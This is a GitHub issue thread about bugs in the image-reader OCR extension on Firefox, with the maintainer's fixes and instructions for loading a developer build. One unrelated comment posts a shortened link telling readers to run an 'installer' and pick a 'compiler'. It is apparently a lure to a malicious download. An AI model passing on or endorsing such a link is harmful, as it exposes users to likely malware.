### ISSUE TITLE
Feature Requests / Bugs

### ISSUE THREAD

**Issue by UreshiiPanda** [brian-girko/image-reader#14]
Thanks so much for the awesome extension, the translation works pretty well. The following are some small bugs/features that I noticed were missing or were not working:

1. The docs say this extension has a shortcut in FireFox but my FireFox lists this extension as having no shortcuts available.
2. The "copy to clipboard" setting doesn't auto-copy to system clipboard for me and the "close after" setting caused my cursor to be stuck in screenshot mode (with the crosshairs) until the page was re-loaded even though the OCR extension button was not re-pressed.
3. There seems to be no way out of the extension after the button is pressed. Like if I hit the button then decide not to take a screenshot, I can't hit "escape" or some other key to get back to normal cursor.

System specs:
FireFox version 129.0b9 (64-bit)
Mac M2 Sonoma 14.5

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by brian-girko** [comment]
> FireFox lists this extension as having no shortcuts 

This is fixed.

> The "copy to clipboard" setting doesn't auto-copy to system clipboard 

This is fixed too. On Firefox the user needs to allow the optional permission from the extensions manager tab though.

> Cursor to be stuck in screenshot mode (with the crosshairs)

I was not able to produce this error. Please give the developer version a try and let me know if you still have the issue

>  can't hit "escape" or some other key to get back to normal cursor.

For me, if I hit "escape" the extension exits the capturing mode.


To try the developer version:

1. Open `about:debugging#/runtime/this-firefox` in a browser tab
2. Disable the old extension
3. Download https://github.com/brian-girko/image-reader/archive/refs/heads/master.zip and extract to local dir
4. Click "Load temporary Addon" and point it to "v3/manifest.json"

**Comment by UreshiiPanda** [comment]
Ahh ok the version in the Firefox extension store must be an older version. Your steps fixed all of these issues except for exiting the extension (eg: "escape" doesn't exit capture mode for me) but I think this is due to the fact that I'm running another extension called Tridactyl which also uses "escape" constantly.

I noticed re-clicking the extension button (and re-typing the shortcut key) also doesn't exit capture mode and there is no assignable shortcut for exiting capture mode. Might be a feature worth considering for those of us that have "escape" locked up to another extension/function.

Appreciate the help.

**Comment by brian-girko** [comment]
I see. From the next release, you can use the default keyboard shortcut for activing the action button to exit the capturing mode if it is active.
